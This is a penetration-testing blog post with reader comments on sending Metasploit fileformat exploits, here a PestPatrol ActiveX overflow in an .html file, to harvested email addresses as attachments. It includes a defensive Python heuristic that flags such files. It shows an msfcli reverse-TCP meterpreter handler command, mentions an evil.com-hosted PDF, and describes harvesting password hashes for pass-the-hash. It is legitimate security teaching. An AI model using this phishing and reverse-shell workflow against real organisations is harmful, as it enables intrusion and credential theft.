Video: Client-Sides, Social Engineering and Metasploit, Oh My!

It should be obvious to everyone that the bad guys are moving away from network-level attacks and toward social engineering coupled with client-side attacks. In fact, this is the focus of the next ChicagoCon in May, where I will be presenting this exact topic live. Penetration testers need to be able to help an organization detect and respond to client-side attacks, and what better way to do that than to do a little client-side exploitation during your pentests.

A new mixin has been added to the Metasploit Framework that allows the penetration tester to create and output the files that contain the exploit code instead of just serving up the exploit on a web page. This increases the attack surface by allowing the pentester to perform Open Source Intelligence (OSINT) gathering to collect email addresses for the target domain. We then take those addresses and actually send the exploit to the victim as an attachment in the email rather than as a link to a website. Your mileage may vary on the effectiveness of that technique, but in my experience people seem to be more apt to open attachments of a "normal" or "non-malicious" type like .pdf and .html than to click on links. Some example formats that can be used with the fileformat mixin are .pdf, .html, .cab, .m3u and .xpm, as well as others.

This isn't to say that some fileformat exploits can't be delivered via the web. You can easily link to www.evil.com/evil.pdf, but some lend themselves to easier exploitation if you can get the file into a user's inbox. So let's take a quick look at how this can be accomplished.

For our example we'll use a vulnerability in the ActiveX control for eTrust PestScan. Because this control is not marked safe for scripting, it won't run if a user browses to the page in the Internet zone. But if they open a .html file that calls the vulnerable control, we can execute code.

“This module exploits a stack overflow in CA eTrust PestPatrol. When sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.”
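From the defender's side, the module description above gives enough to write a triage heuristic for inbound .html attachments: an ActiveX control is instantiated and one of its methods is handed an abnormally long string. The following is an added example written for this article, not code from the original post or from the Metasploit project. The CLSID and ProgID in the sample documents are placeholders (the real control's identifiers are not given on this page), the 256-byte threshold is an assumption, and the three HTML documents are constructed inputs embedded so the script runs offline.

```python
"""Triage heuristic for HTML attachments that script an ActiveX control.

Added example (not from the original post or the Metasploit project).
Flags an HTML document when it BOTH instantiates an ActiveX control AND
passes an unusually long string to a method, which is the shape of the
PestPatrol Initialize() overflow described above.
"""
import re

# Assumption for this example: no legitimate Initialize()-style call takes
# a string anywhere near this long.
LONG_STRING_THRESHOLD = 256

# <object classid="clsid:...">  (captures the CLSID)
OBJECT_TAG = re.compile(
    r'<object[^>]*classid\s*=\s*["\']?clsid:([0-9a-f-]{36})', re.I)
# new ActiveXObject("Vendor.Control")  (captures the ProgID)
ACTIVEX_CTOR = re.compile(
    r'new\s+ActiveXObject\s*\(\s*["\']([^"\']+)["\']', re.I)
# obj.Method("literal")  (captures method name, quote char, literal)
STRING_CALL = re.compile(r'\.(\w+)\s*\(\s*(["\'])(.*?)\2\s*\)', re.S)
# Array(N).join("A")  builds an (N-1)-byte string without a long literal
JOIN_BUILDER = re.compile(r'Array\s*\(\s*(\d+)\s*\)\s*\.join\s*\(', re.I)


def triage_html(text):
    """Return a list of human-readable findings for one HTML document."""
    findings = []
    controls = OBJECT_TAG.findall(text) + ACTIVEX_CTOR.findall(text)
    if not controls:
        return findings  # no ActiveX instantiation: nothing to flag
    findings.append("instantiates ActiveX control(s): " + ", ".join(controls))
    for method, _quote, literal in STRING_CALL.findall(text):
        if len(literal) >= LONG_STRING_THRESHOLD:
            findings.append(
                f"{method}() called with {len(literal)}-byte string literal")
    for count in JOIN_BUILDER.findall(text):
        if int(count) >= LONG_STRING_THRESHOLD:
            findings.append(
                f"string of ~{int(count) - 1} bytes built with Array().join()")
    return findings


def is_suspicious(text):
    """True when a control is instantiated AND a long-string indicator exists."""
    return len(triage_html(text)) > 1


# Constructed sample documents (placeholders, not real identifiers).
BENIGN_HTML = """<html><body><script>
document.write("hello");
</script></body></html>"""

SUSPICIOUS_HTML = """<html><body>
<object id="ctl" classid="clsid:00000000-0000-0000-0000-000000000000"></object>
<script>
var pad = Array(3001).join("A");
ctl.Initialize(pad);
</script></body></html>"""

LITERAL_HTML = ('<script>var o = new ActiveXObject("Placeholder.Control");'
                'o.Initialize("' + "A" * 400 + '");</script>')

if __name__ == "__main__":
    for name, doc in [("benign", BENIGN_HTML), ("join-built", SUSPICIOUS_HTML),
                      ("literal", LITERAL_HTML)]:
        print(name, "->", "SUSPICIOUS" if is_suspicious(doc) else "clean")
        for line in triage_html(doc):
            print("   ", line)
```

The two-condition rule matters: plenty of legitimate intranet pages instantiate ActiveX controls, and plenty of scripts contain long strings, so either signal alone would drown an analyst in false positives. Requiring both keeps the heuristic narrow enough to be useful as a first-pass filter on mail-gateway quarantines.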

Fileformat bugs require you to run the multi/handler so you can catch the returning shells.

cg@attack:~/evil/msf3$ ./msfcli
Usage: ./msfcli [mode]
====================================================
    Mode           Description
    ----           -----------
    (H)elp         You're looking at it baby!
    (S)ummary      Show information about this module
    (O)ptions      Show available options for this module
    (A)dvanced     Show available advanced options for this module
    (I)DS Evasion  Show available ids evasion options for this module
    (P)ayloads     Show available payloads for this module
    (T)argets      Show available targets for this exploit module
    (AC)tions      Show available actions for this auxiliary module
    (C)heck        Run the check routine of the selected module
    (E)xecute      Execute the selected module
cg@attack:~/evil/msf3$ ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.0.101 E
[*] Started reverse handler
[*] Starting the payload handler...

And now on to the video (another example of malicious PDFs in action) ...

Video is in the process of moving to our YouTube Channel

Conclusion

With a combination of user interaction and the power of Metasploit, we were able to grab password hashes. From here, a jolt of Ophcrack, some rainbow tables, or a pass-the-hash action and we're off to completing our network pentest goals. This is a perfect example of electronically assisted social engineering, and of how it can be a very effective addition to your toolset.

Extra Resources

Chris Gates, Sr Security Engineer, has been breaking things professionally for over a decade via Network & Web Application Penetration Testing, Red Teaming & Adversarial Simulation. These days Chris splits his time being both a breaker and fixer. Chris is the author of Metta, a tool for adversarial simulation and contributes to other open source projects. In the past he has spoken at the United States Military Academy, BlackHat, DefCon, Wild West Hacking Fest, Toorcon, Brucon, Troopers, SOURCE Boston, Derbycon, LasCon, HashDays, HackCon, Bsides ATL, IT Defense, OWASP AppSec DC, and Devops Days. Chris is also a cofounder of NoVAHackers. Blog: carnal0wnage.attackresearch.com Twitter: @carnal0wnage Talks: https://www.slideshare.net/chrisgates/

Great examples and video 🙂 I was playing with this stuff the other day with the office macros in Metasploit. It seemed to be quite effective. It’s amazing what folks will click on with a good backstory.

Like your other videos as well as this one, I’ve got to say nice work. It’s a good thing Metasploit has broadened its horizons and incorporated the use of fileformat exploits. I’d sure like your trunk by the way, 327 Exploits I only have 288 (I think…)

Thanks. I was testing this for a presentation but Symantec actually catches it. So, I am trying the vbscript attack.

Sadly, there is a quirk with either Metasploit or BT3. Not sure which yet. When I run the /msfcli multi/handler PAYLOAD= LHOST= etc…, it runs the exploit and binds to IP=0.0.0.0 which is less than helpful.

Heh, I guess there was no reason to assume this would be that easy. ;D

Mine also binds to 0.0.0.0, but when testing this out I created a malicious .exe using msfpayload. This was going to be a reverse meterpreter .exe that would shovel back a shell to a port on my box. So I set my LHOST similar to you when using exploit/multi/multi_handler and keyed exploit on my msfconsole. It said 0.0.0.0; however, once I executed my .exe I received my reverse shell.

Bite the bullet and switch to Linux. I'm not sure why Moore and company waste time on the Windows version as it is just a shadow of the msfconsole. Generally, when that stuff happened on Windows, I uninstalled and reinstalled and it would fix it.

Did you try uninstalling and reinstalling? When the MS08_067 exploit arrived, the update function would not pull everything properly. Or it wasn’t registering things correctly. This happened to several friends. The fastest fix I found was to uninstall and reinstall the app.

And sorry, didn't mean to sound mean about the Windows thing. I just gave up the Windows version the other day. I tried to make it work until I wanted to practice backgrounding a session and routing through it. It just doesn't work properly in Windows. That's all. I have found the Windows interface to be buggy.